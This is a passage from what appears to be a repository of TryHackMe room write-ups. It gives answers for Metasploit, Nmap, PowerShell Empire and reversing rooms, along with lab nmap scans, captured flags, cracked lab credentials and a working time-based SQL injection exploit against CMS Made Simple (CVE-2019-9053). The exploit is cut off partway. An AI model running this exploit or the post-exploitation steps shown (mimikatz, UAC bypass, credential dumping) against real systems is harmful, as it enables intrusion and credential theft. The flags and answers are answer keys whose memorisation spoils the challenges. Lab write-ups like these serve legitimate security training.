29 | #11 How about changing the value of a variable to null/no value? : `unset`
30 |
31 | #12 When performing a penetration test it's quite common to record your screen either for further review or for providing evidence of any actions taken. This is often coupled with the collection of console output to a file as it can be incredibly useful to grep for different pieces of information output to the screen. What command can we use to set our console output to save to a file? : `spool`
32 |
33 | #13 Leaving a Metasploit console running isn't always convenient and it can be helpful to have all of our previously set values load when starting up Metasploit. What command can we use to store the settings/active datastores from Metasploit to a settings file? This will save within your msf4 (or msf5) directory and can be undone easily by simply removing the created settings file. : `save`
34 |
35 | ### [Task 4] Modules for Every Occasion!
36 |
37 | #1 Easily the most common module utilized, which module holds all of the exploit code we will use? : `exploit`
38 |
39 | #2 Used hand in hand with exploits, which module contains the various bits of shellcode we send to have executed following exploitation? : `payload`
40 |
41 | #3 Which module is most commonly used in scanning and verification machines are exploitable? This is not the same as the actual exploitation of course. : `auxiliary`
42 |
43 | #4 One of the most common activities after exploitation is looting and pivoting. Which module provides these capabilities? : `post`
44 |
45 | #5 Commonly utilized in payload obfuscation, which module allows us to modify the 'appearance' of our exploit such that we may avoid signature detection? : `encoder`
46 |
47 | #6 Last but not least, which module is used with buffer overflow and ROP attacks? : `nop`
48 |
49 | #7 Not every module is loaded in by default, what command can we use to load different modules? : `load`
50 |
51 | ### [Task 5] Move that shell!
52 |
53 | #2 What service does nmap identify running on port 135? : `msrpc`
54 |
55 | #6 Now that we've scanned our victim system, let's try connecting to it with a Metasploit payload. First, we'll have to search for the target payload. In Metasploit 5 (the most recent version at the time of writing) you can simply type 'use' followed by a unique string found within only the target exploit. For example, try this out now with the following command 'use icecast'. What is the full path for our exploit that now appears on the msfconsole prompt? *This will include the exploit section at the start : `exploit/windows/http/icecast_header`
56 |
57 | #7 While that use command with the unique string can be incredibly useful that's not quite the exploit we want here. Let's now run the command 'search multi/handler'. What is the name of the column on the far left side of the console that shows up next to 'Name'? Go ahead and run the command use NUMBER_NEXT_TO exploit/multi/handler wherein the number will be what appears in that far left column (typically this will be 4 or 5). In this way, we can use our search results without typing out the full name/path of the module we want to use. : `#`
58 |
59 | ### [Task 6] We're in, now what?
60 |
61 | #1 First things first, our initial shell/process typically isn't very stable. Let's go ahead and attempt to move to a different process. First, let's list the processes using the command 'ps'. What's the name of the spool service? : `spoolsv.exe`
62 |
63 | #2 Let's go ahead and move into the spool process or at least attempt to! What command do we use to transfer ourselves into the process? This won't work at the current time as we don't have sufficient privileges but we can still try! : `migrate`
64 |
65 | #3 Well that migration didn't work, let's find out some more information about the system so we can try to elevate. What command can we run to find out more information regarding the current user running the process we are in? : `getuid`
66 |
67 | #4 How about finding more information out about the system itself? : `sysinfo`
68 |
69 | #5 This might take a little bit of googling, what do we run to load mimikatz (more specifically the new version of mimikatz) so we can use it? : `load kiwi`
70 |
71 | #6 Let's go ahead and figure out the privileges of our current user, what command do we run? : `getprivs`
72 |
73 | #7 What command do we run to transfer files to our victim computer? : `upload`
74 |
75 | #8 How about if we want to run a Metasploit module? : `run`
76 |
77 | #9 A simple question but still quite necessary, what command do we run to figure out the networking information and interfaces on our victim? : `ipconfig`
78 |
79 | #13 One quick extra question, what command can we run in our meterpreter session to spawn a normal system shell? : `shell`
80 |
81 | ### [Task 7] Makin' Cisco Proud
82 |
83 | #1 Let's go ahead and run the command `run autoroute -h`, this will pull up the help menu for autoroute. What command do we run to add a route to the following subnet: 172.18.1.0/24? Use the -n flag in your answer. : `run autoroute -s 172.18.1.0 -n 255.255.255.0`
84 |
85 | #2 Additionally, we can start a socks4a proxy server out of this session. Background our current meterpreter session and run the command `search server/socks4a`. What is the full path to the socks4a auxiliary module? : `auxiliary/server/socks4a`
86 |
87 | #3 Once we've started a socks server we can modify our /etc/proxychains.conf file to include our new server. What command do we prefix our commands (outside of Metasploit) to run them through our socks4a server with proxychains? : `proxychains`
88 |
--------------------------------------------------------------------------------
/RP Nmap/README.md:
--------------------------------------------------------------------------------
1 | # Nmap | https://tryhackme.com/room/rpnmap
2 |
3 | ### [Task 2] Nmap Quiz
4 |
5 | #1 First, how do you access the help menu? : `-h`
6 |
7 | #2 Often referred to as a stealth scan, what is the first switch listed for a 'Syn Scan'? : `-sS`
8 |
9 | #3 Not quite as useful but how about a 'UDP Scan'? : `-sU`
10 |
11 | #4 What about operating system detection? : `-O`
12 |
13 | #5 How about service version detection? : `-sV`
14 |
15 | #6 Most people like to see some output to know that their scan is actually doing things, what is the verbosity flag? : `-v`
16 |
17 | #7 What about 'very verbose'? (A personal favorite) : `-vv`
18 |
19 | #8 Sometimes saving output in a common document format can be really handy for reporting, how do we save output in xml format? : `-oX`
20 |
21 | #9 Aggressive scans can be nice when other scans just aren't getting the output that you want and you really don't care how 'loud' you are, what is the switch for enabling this? : `-A`
22 |
23 | #10 How do I set the timing to the max level, sometimes called 'Insane'? : `-T5`
24 |
25 | #11 What about if I want to scan a specific port? : `-p`
26 |
27 | #12 How about if I want to scan every port? : `-p-`
28 |
29 | #13 What if I want to enable using a script from the nmap scripting engine? For this, just include the first part of the switch without the specification of what script to run. : `--script`
30 |
31 | #14 What if I want to run all scripts out of the vulnerability category? : `--script vuln`
32 |
33 | #15 What switch should I include if I don't want to ping the host? : `-Pn`
34 |
35 | ### [Task 3] Nmap Scanning
36 |
37 | #1 Let's go ahead and start with the basics and perform a syn scan on the box provided. What will this command be without the host IP address? : `nmap -sS`
38 |
39 | #2 After scanning this, how many ports do we find open under 1000? : `2`
40 |
41 | #3 What communication protocol is given for these ports following the port number? : `tcp`
42 |
43 | #4 Perform a service version detection scan, what is the version of the software running on port 22? : `6.6.1p1`
44 |
45 | #5 Perform an aggressive scan, what flag isn't set under the results for port 80? : `httponly`
46 |
47 | #6 Perform a script scan of vulnerabilities associated with this box, what denial of service (DOS) attack is this box susceptible to? Answer with the name for the vulnerability that is given as the section title in the scan output. A vuln scan can take a while to complete. In case you get stuck, the answer for this question has been provided in the hint, however, it's good to still run this scan and get used to using it as it can be invaluable. : `http-slowloris-check`
--------------------------------------------------------------------------------
/RP Nmap/nmap --script vuln 10.10.34.127.txt:
--------------------------------------------------------------------------------
1 | nmap --script vuln 10.10.34.127
2 |
3 | Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-03-21 13:40 IST
4 | Stats: 0:01:01 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
5 | Nmap scan report for 10.10.34.127
6 | Host is up (0.23s latency).
7 | Not shown: 998 closed ports
8 | PORT STATE SERVICE
9 | 22/tcp open ssh
10 | |_clamav-exec: ERROR: Script execution failed (use -d to debug)
11 | 80/tcp open http
12 | |clamav-exec: ERROR: Script execution failed (use -d to debug)
13 | | http-cookie-flags:
14 | | /:
15 | | PHPSESSID:
16 | | httponly flag not set
17 | | /login.php:
18 | | PHPSESSID:
19 | | httponly flag not set
20 | |_http-csrf: Couldn't find any CSRF vulnerabilities.
21 | |http-dombased-xss: Couldn't find any DOM based XSS.
22 | | http-enum:
23 | | /login.php: Possible admin folder
24 | | /robots.txt: Robots file
25 | | /config/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
26 | | /docs/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
27 | | /external/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
28 | | http-slowloris-check:
29 | | VULNERABLE:
30 | | Slowloris DOS attack
31 | | State: LIKELY VULNERABLE
32 | | IDs: CVE:CVE-2007-6750
33 | | Slowloris tries to keep many connections to the target web server open and hold
34 | | them open as long as possible. It accomplishes this by opening connections to
35 | | the target web server and sending a partial request. By doing so, it starves
36 | | the http server's resources causing Denial Of Service.
37 | |
38 | | Disclosure date: 2009-09-17
39 | | References:
40 | | http://ha.ckers.org/slowloris/
41 | |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
42 | |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
--------------------------------------------------------------------------------
/RP Nmap/nmap -A 10.10.34.127.txt:
--------------------------------------------------------------------------------
1 | nmap -A 10.10.34.127
2 |
3 | Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-03-21 13:38 IST
4 | Stats: 0:00:24 elapsed; 0 hosts completed (1 up), 1 undergoing Traceroute
5 | Traceroute Timing: About 32.26% done; ETC: 13:38 (0:00:00 remaining)
6 | Nmap scan report for 10.10.34.127
7 | Host is up (0.22s latency).
8 | Not shown: 998 closed ports
9 | PORT STATE SERVICE VERSION
10 | 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
11 | | ssh-hostkey:
12 | | 1024 b8:6c:15:90:70:1f:8d:c6:1d:1c:ff:6f:80:f4:ad:db (DSA)
13 | | 2048 7d:b7:f7:42:15:d1:98:c2:38:55:84:14:58:4f:c8:1a (RSA)
14 | | 256 4d:3d:eb:49:9e:15:e6:d3:9a:41:ea:0d:68:d8:7d:d3 (ECDSA)
15 | |_ 256 08:ae:1f:5d:2e:6e:9d:8f:4c:2e:a4:bb:be:fe:9d:82 (ED25519)
16 | 80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
17 | | http-cookie-flags:
18 | | /:
19 | | PHPSESSID:
20 | | httponly flag not set
21 | | http-robots.txt: 1 disallowed entry
22 | |/
23 | |_http-server-header: Apache/2.4.7 (Ubuntu)
24 | | http-title: Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Develop...
25 | |_Requested resource was login.php
26 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
27 | TCP/IP fingerprint:
28 | OS:SCAN(V=7.80%E=4%D=3/21%OT=22%CT=1%CU=44727%PV=Y%DS=2%DC=T%G=Y%TM=5E75CB9
29 | OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=106%TI=Z%CI=I%II=I%TS=8)OPS
30 | OS:(O1=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST1
31 | OS:1NW6%O6=M54DST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
32 | OS:(R=Y%DF=Y%T=40%W=6903%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
33 | OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
34 | OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
35 | OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
36 | OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
37 | OS:=S)
38 | Network Distance: 2 hops
39 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
40 |
41 | TRACEROUTE (using port 995/tcp)
42 | HOP RTT ADDRESS
43 | 1 224.00 ms 10.9.0.1
44 | 2 224.06 ms 10.10.34.127
--------------------------------------------------------------------------------
/RP Nmap/nmap -sS 10.10.34.127 .txt:
--------------------------------------------------------------------------------
1 | nmap -sS 10.10.34.127
2 |
3 | Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-03-21 13:36 IST
4 | Nmap scan report for 10.10.34.127
5 | Host is up (0.24s latency).
6 | Not shown: 998 closed ports
7 | PORT STATE SERVICE
8 | 22/tcp open ssh
9 | 80/tcp open http
--------------------------------------------------------------------------------
/RP Nmap/nmap -sV -p 22 10.10.34.127.txt:
--------------------------------------------------------------------------------
1 | nmap -sV -p 22 10.10.34.127
2 |
3 | Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-03-21 13:37 IST
4 | Nmap scan report for 10.10.34.127
5 | Host is up (0.22s latency).
6 |
7 | PORT STATE SERVICE VERSION
8 | 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
9 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
--------------------------------------------------------------------------------
/RP PS-Empire/PowerShell Empire.txt:
--------------------------------------------------------------------------------
1 | https://github.com/BC-SECURITY/Empire/
--------------------------------------------------------------------------------
/RP PS-Empire/README.md:
--------------------------------------------------------------------------------
1 | # RP: PS Empire | https://tryhackme.com/room/rppsempire
2 |
3 | ### [Task 3] Listeners
4 |
5 | #1 Once empire has launched, type help to view the various menus. Which menu to we launch to access listeners? : `listeners`
6 |
7 | #3 What command can we now type to view all of the options related to our selected listener type? : `info`
8 |
9 | #4 Once the information regarding the listener pops up, peruse this for some of the more interesting options we can set in order to disguise our actions more. Which option can we use to set specific times when our listener will be active? : `WorkingHours`
10 |
11 | #5 Similar to changing/spoofing what browser you are using on the internet, what option can we set to appear as a different user agent (i.e. chrome, firefox, etc)? : `DefaultProfile`
12 |
13 | #6 What option can we use to set the port which the listener will bind to? : `port`
14 |
15 | #7 In addition to changing our browser profile, we can change what our server appears as. What option can we set to change this? : `ServerVersion`
16 |
17 | #8 Launch our newly created listener on port 80 with the command 'execute'. What message is displayed following successfully launching the listener? : `Listener successfully started!`
18 |
19 | #9 We can verify that our listener is now active by typing what command? : `listeners`
20 |
21 | ### [Task 4] Stagers
22 |
23 | #1 First, type the command 'usestager' and double-tap tab to view all options we have for stagers. Which option allows us to use a batch file? : `windows/launcher_bat`
24 |
25 | #2 Let's finish our previous command and select the batch file option. Press enter to finalize this. What is our new path to the 'module' we have selected? : `stager/windows/launcher_bat`
26 |
27 | #3 Since we've previously set our listener to use http, we must now set the associated options within our stager we are building to match that. What option must we set in order to accomplish this? : `Listener`
28 |
29 | #4 Type execute to finish creating our stager. Where is the stager saved? : `/tmp/launcher.bat`
30 |
31 | ### [Task 5] Agents and Post-Exploitation
32 |
33 | #3 What command do we use to interact with an agent? : `interact`
34 |
35 | #4 What about if we wanted to list any usernames and passwords we have gathered? : `creds`
36 |
37 | #5 And if we wanted to 'deactivate' an agent for a while to avoid detection? : `sleep`
38 |
39 | #6 How about if we wanted to delete an agent or disconnect it? : `kill`
40 |
41 | #7 Moving into the post exploitation modules, what command can we use to search through these? : `searchmodule`
42 |
43 | #8 We'll start with the most important module, find the module which plays a specific AC/DC song. : `python/trollsploit/osx/thunderstruck`
44 |
45 | #9 What if we wanted to perform an lsa dump with a certain popular windows credential gathering tool? : `powershell/credentials/mimikatz/lsadump`
46 |
47 | #10 Sometime we might not have the permissions level that we require to perform further actions, what module set might we have to use to get around UAC? : `bypassuac`
48 |
49 | #11 What module family allows us to gather additional information about the network we are on? : `recon`
50 |
51 | #12 Our process we have compromised might not be the most stable, how do we migrate to another process? (This will have a specific module answer) : `powershell/management/psinject`
52 |
53 | #13 Last but not least, what module can we use to turn on remote desktop access for our purposes? : `powershell/management/enable_rdp`
54 |
--------------------------------------------------------------------------------
/RP PS-Empire/exploit.txt:
--------------------------------------------------------------------------------
1 | ms17_010_eternalblue
--------------------------------------------------------------------------------
/RP PS-Empire/nmap_vuln.nmap:
--------------------------------------------------------------------------------
1 | # Nmap 7.80 scan initiated Fri May 29 01:17:59 2020 as: nmap --script vuln -oN nmap_vuln.nmap 10.10.64.241
2 | Pre-scan script results:
3 | | broadcast-avahi-dos:
4 | | Discovered hosts:
5 | | 224.0.0.251
6 | | After NULL UDP avahi packet DoS (CVE-2011-1002).
7 | |_ Hosts are all up (not vulnerable).
8 | Nmap scan report for 10.10.64.241
9 | Host is up (0.22s latency).
10 | Not shown: 991 closed ports
11 | PORT STATE SERVICE
12 | 135/tcp open msrpc
13 | |_clamav-exec: ERROR: Script execution failed (use -d to debug)
14 | 139/tcp open netbios-ssn
15 | |_clamav-exec: ERROR: Script execution failed (use -d to debug)
16 | 445/tcp open microsoft-ds
17 | |_clamav-exec: ERROR: Script execution failed (use -d to debug)
18 | 3389/tcp open ms-wbt-server
19 | |_clamav-exec: ERROR: Script execution failed (use -d to debug)
20 | |_sslv2-drown:
21 | 49152/tcp open unknown
22 | |_clamav-exec: ERROR: Script execution failed (use -d to debug)
23 | 49153/tcp open unknown
24 | |_clamav-exec: ERROR: Script execution failed (use -d to debug)
25 | 49154/tcp open unknown
26 | |_clamav-exec: ERROR: Script execution failed (use -d to debug)
27 | 49158/tcp open unknown
28 | |_clamav-exec: ERROR: Script execution failed (use -d to debug)
29 | 49160/tcp open unknown
30 | |_clamav-exec: ERROR: Script execution failed (use -d to debug)
31 |
32 | Host script results:
33 | |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
34 | |_smb-vuln-ms10-054: false
35 | |_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
36 | | smb-vuln-ms17-010:
37 | | VULNERABLE:
38 | | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
39 | | State: VULNERABLE
40 | | IDs: CVE:CVE-2017-0143
41 | | Risk factor: HIGH
42 | | A critical remote code execution vulnerability exists in Microsoft SMBv1
43 | | servers (ms17-010).
44 | |
45 | | Disclosure date: 2017-03-14
46 | | References:
47 | | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
48 | | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
49 | |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
50 |
51 | # Nmap done at Fri May 29 01:20:06 2020 -- 1 IP address (1 host up) scanned in 127.00 seconds
52 |
--------------------------------------------------------------------------------
/Retro/CVE-2017-0213_x64.tar.xz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Retro/CVE-2017-0213_x64.tar.xz
--------------------------------------------------------------------------------
/Retro/README.md:
--------------------------------------------------------------------------------
1 | # Retro | https://tryhackme.com/room/retro
2 |
3 | ### [Task 1] Pwn
4 |
5 | #1 What is the hidden directory which the website lives on? ```: /retro```
6 |
7 | #2 user.txt : ```3b99fbdc6d430bfb51c72c651a261927```
8 |
9 | #3 root.txt : ```7958b569565d7bd88d10c6f22d1c4063```
--------------------------------------------------------------------------------
/Reversing ELF/README.md:
--------------------------------------------------------------------------------
1 | # Reversing ELF | https://tryhackme.com/room/reverselfiles
2 |
3 | ### [Task 1] Crackme1
4 |
5 | Let's start with a basic warmup, can you run the binary?
6 |
7 | #1 What is the flag? : ```flag{not_that_kind_of_elf}```
8 |
9 | ### [Task 2] Crackme2
10 |
11 | Find the super-secret password! and use it to obtain the flag
12 |
13 | #1 What is the super secret password ? : ```super_secret_password```
14 |
15 | #2 What is the flag ? : ```flag{if_i_submit_this_flag_then_i_will_get_points}```
16 |
17 | ### [Task 3] Crackme3
18 |
19 | Use basic reverse engineering skills to obtain the flag
20 |
21 | #1 What is the flag? : ```f0r_y0ur_5ec0nd_le55on_unbase64_4ll_7h3_7h1ng5```
22 |
23 | ### [Task 4] Crackme4
24 |
25 | Analyze and find the password for the binary?
26 |
27 | #1 What is the password ? : ```my_m0re_secur3_pwd```
28 |
29 | ### [Task 5] Crackme5
30 |
31 | What will be the input of the file to get output Good game ?
32 |
33 | #1 What is the input ? : ```OfdlDSA|3tXb32~X3tX@sX`4tXtz```
34 |
35 | ### [Task 6] Crackme6
36 |
37 | Analyze the binary for the easy password
38 |
39 | #1 What is the password ? : ```1337_pwd```
40 |
41 | ### [Task 7] Crackme7
42 |
43 | Analyze the binary to get the flag
44 |
45 | #1 What is the flag ? : ```flag{much_reversing_very_ida_wow}```
46 |
47 | ### [Task 8] Crackme8
48 |
49 | Analyze the binary and obtain the flag
50 |
51 | #1 What is the flag ? : ```flag{at_least_this_cafe_wont_leak_your_credit_card_numbers}```
52 |
--------------------------------------------------------------------------------
/Reversing ELF/crackme1:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme1
--------------------------------------------------------------------------------
/Reversing ELF/crackme2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme2
--------------------------------------------------------------------------------
/Reversing ELF/crackme3:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme3
--------------------------------------------------------------------------------
/Reversing ELF/crackme4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme4
--------------------------------------------------------------------------------
/Reversing ELF/crackme5:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme5
--------------------------------------------------------------------------------
/Reversing ELF/crackme6:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme6
--------------------------------------------------------------------------------
/Reversing ELF/crackme7:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme7
--------------------------------------------------------------------------------
/Reversing ELF/crackme8:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Reversing ELF/crackme8
--------------------------------------------------------------------------------
/Shodan.io/README.md:
--------------------------------------------------------------------------------
1 | # Shodan.io | https://tryhackme.com/room/shodan
2 |
3 | ### [Task 2] Getting Started
4 |
5 | #1 What is Google's ASN number? : `AS15169`
6 |
7 | #2 When was it allocated? Give the year only. : `2000`
8 |
9 | #3 Where are most of the machines on this ASN number, physically in the world? : `United States`
10 |
11 | #4 What is Google's top service across all their devices on this ASN? : `SSH`
12 |
13 | #5 What SSH product does Google use? : `OpenSSH`
14 |
15 | #6 What is Google's most used Google product, according to this search? Ignore the word "Google" in front of it. : `Cloud`
16 |
17 | ### [Task 4] Google & Filtering
18 |
19 | #1 What is the top operating system for MYSQL servers in Google's ASN? : `Linux 3.x`
20 |
21 | #2 What is the 3rd most popular country for MYSQL servers in Google's ASN? : `EU`
22 |
23 | #3 Under Google's ASN, which is more popular for nginx, Hypertext Transfer Protocol or Hypertext Transfer Protocol(s)? : `Hypertext Transfer Protocol`
24 |
25 | #4 Under Google's ASN, what is the most popular city? : `Mountain View`
26 |
27 | #5 Under Google's ASN in Oakland, what is the top operating system according to Shodan? : `Windows Server 2012`
28 |
29 | #6 Using the top Webcam search from the explore page, does Google's ASN have any webcams? (Yay/Nay) : `Nay`
30 |
--------------------------------------------------------------------------------
/Simple CTF/CVE.txt:
--------------------------------------------------------------------------------
1 | CMS Made Simple < 2.2.10 - SQL Injection
2 |
3 | CVE: 2019-9053
4 |
5 | https://www.exploit-db.com/exploits/46635
--------------------------------------------------------------------------------
/Simple CTF/README.md:
--------------------------------------------------------------------------------
1 | Simple CTF | https://tryhackme.com/room/easyctf
2 |
3 | ### [Task 1] Simple CTF
4 |
5 | Deploy the machine and attempt the questions!
6 |
7 | #1 How many services are running under port 1000? : `2`
8 |
9 | #2 What is running on the higher port? : `ssh`
10 |
11 | #3 What's the CVE you're using against the application? : `CVE-2019-9053`
12 |
13 | #4 To what kind of vulnerability is the application vulnerable? `sqli`
14 |
15 | #5 What's the password? : `secret`
16 |
17 | #6 Where can you login with the details obtained? : `ssh`
18 |
19 | #7 What's the user flag? : `G00d j0b, keep up!`
20 |
21 | #8 Is there any other user in the home directory? What's its name? : `sunbath`
22 |
23 | #9 What can you leverage to spawn a privileged shell? : `vim`
24 |
25 | #10 What's the root flag? : `W3ll d0n3. You made it!`
26 |
--------------------------------------------------------------------------------
/Simple CTF/creds.txt:
--------------------------------------------------------------------------------
1 | [+] Salt for password found : 1dac0d92e9fa6bb2
2 | [+] Username found : mitch
3 | [+] Email found : admin@admin.com
4 | [+] Password found : 0c01f4468bd75d7a84c7eb73846e8d96
5 | [+] Password cracked : secret
6 |
--------------------------------------------------------------------------------
/Simple CTF/exploit.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
3 | # Date: 30-03-2019
4 | # Exploit Author: Daniele Scanu @ Certimeter Group
5 | # Vendor Homepage: https://www.cmsmadesimple.org/
6 | # Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
7 | # Version: <= 2.2.9
8 | # Tested on: Ubuntu 18.04 LTS
9 | # CVE : CVE-2019-9053
10 |
11 | import requests
12 | from termcolor import colored
13 | import time
14 | from termcolor import cprint
15 | import optparse
16 | import hashlib
17 |
18 | parser = optparse.OptionParser()
19 | parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://10.10.10.100/cms)")
20 | parser.add_option('-w', '--wordlist', action="store", dest="wordlist", help="Wordlist for crack admin password")
21 | parser.add_option('-c', '--crack', action="store_true", dest="cracking", help="Crack password with wordlist", default=False)
22 |
23 | options, args = parser.parse_args()
24 | if not options.url:
25 | print "[+] Specify an url target"
26 | print "[+] Example usage (no cracking password): exploit.py -u http://target-uri"
27 | print "[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist"
28 | print "[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based."
29 | exit()
30 |
31 | url_vuln = options.url + '/moduleinterface.php?mact=News,m1_,default,0'
32 | session = requests.Session()
33 | dictionary = '1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM@._-$'
34 | flag = True
35 | password = ""
36 | temp_password = ""
37 | TIME = 1
38 | db_name = ""
39 | output = ""
40 | email = ""
41 |
42 | salt = ''
43 | wordlist = ""
44 | if options.wordlist:
45 | wordlist += options.wordlist
46 |
47 | def crack_password():
48 | global password
49 | global output
50 | global wordlist
51 | global salt
52 | dict = open(wordlist)
53 | for line in dict.readlines():
54 | line = line.replace("\n", "")
55 | beautify_print_try(line)
56 | if hashlib.md5(str(salt) + line).hexdigest() == password:
57 | output += "\n[+] Password cracked: " + line
58 | break
59 | dict.close()
60 |
61 | def beautify_print_try(value):
62 | global output
63 | print "\033c"
64 | cprint(output,'green', attrs=['bold'])
65 | cprint('[*] Try: ' + value, 'red', attrs=['bold'])
66 |
67 | def beautify_print():
68 | global output
69 | print "\033c"
70 | cprint(output,'green', attrs=['bold'])
71 |
72 | def dump_salt():
73 | global flag
74 | global salt
75 | global output
76 | ord_salt = ""
77 | ord_salt_temp = ""
78 | while flag:
79 | flag = False
80 | for i in range(0, len(dictionary)):
81 | temp_salt = salt + dictionary[i]
82 | ord_salt_temp = ord_salt + hex(ord(dictionary[i]))[2:]
83 | beautify_print_try(temp_salt)
84 | payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_siteprefs+where+sitepref_value+like+0x" + ord_salt_temp + "25+and+sitepref_name+like+0x736974656d61736b)+--+"
85 | url = url_vuln + "&m1_idlist=" + payload
86 | start_time = time.time()
87 | r = session.get(url)
88 | elapsed_time = time.time() - start_time
89 | if elapsed_time >= TIME:
90 | flag = True
91 | break
92 | if flag:
93 | salt = temp_salt
94 | ord_salt = ord_salt_temp
95 | flag = True
96 | output += '\n[+] Salt for password found: ' + salt
97 |
98 | def dump_password():
99 | global flag
100 | global password
101 | global output
102 | ord_password = ""
103 | ord_password_temp = ""
104 | while flag:
105 | flag = False
106 | for i in range(0, len(dictionary)):
107 | temp_password = password + dictionary[i]
108 | ord_password_temp = ord_password + hex(ord(dictionary[i]))[2:]
109 | beautify_print_try(temp_password)
110 | payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users"
111 | payload += "+where+password+like+0x" + ord_password_temp + "25+and+user_id+like+0x31)+--+"
112 | url = url_vuln + "&m1_idlist=" + payload
113 | start_time = time.time()
114 | r = session.get(url)
115 | elapsed_time = time.time() - start_time
116 | if elapsed_time >= TIME:
117 | flag = True
118 | break
119 | if flag:
120 | password = temp_password
121 | ord_password = ord_password_temp
122 | flag = True
123 | output += '\n[+] Password found: ' + password
124 |
125 | def dump_username():
126 | global flag
127 | global db_name
128 | global output
129 | ord_db_name = ""
130 | ord_db_name_temp = ""
131 | while flag:
132 | flag = False
133 | for i in range(0, len(dictionary)):
134 | temp_db_name = db_name + dictionary[i]
135 | ord_db_name_temp = ord_db_name + hex(ord(dictionary[i]))[2:]
136 | beautify_print_try(temp_db_name)
137 | payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+username+like+0x" + ord_db_name_temp + "25+and+user_id+like+0x31)+--+"
138 | url = url_vuln + "&m1_idlist=" + payload
139 | start_time = time.time()
140 | r = session.get(url)
141 | elapsed_time = time.time() - start_time
142 | if elapsed_time >= TIME:
143 | flag = True
144 | break
145 | if flag:
146 | db_name = temp_db_name
147 | ord_db_name = ord_db_name_temp
148 | output += '\n[+] Username found: ' + db_name
149 | flag = True
150 |
151 | def dump_email():
152 | global flag
153 | global email
154 | global output
155 | ord_email = ""
156 | ord_email_temp = ""
157 | while flag:
158 | flag = False
159 | for i in range(0, len(dictionary)):
160 | temp_email = email + dictionary[i]
161 | ord_email_temp = ord_email + hex(ord(dictionary[i]))[2:]
162 | beautify_print_try(temp_email)
163 | payload = "a,b,1,5))+and+(select+sleep(" + str(TIME) + ")+from+cms_users+where+email+like+0x" + ord_email_temp + "25+and+user_id+like+0x31)+--+"
164 | url = url_vuln + "&m1_idlist=" + payload
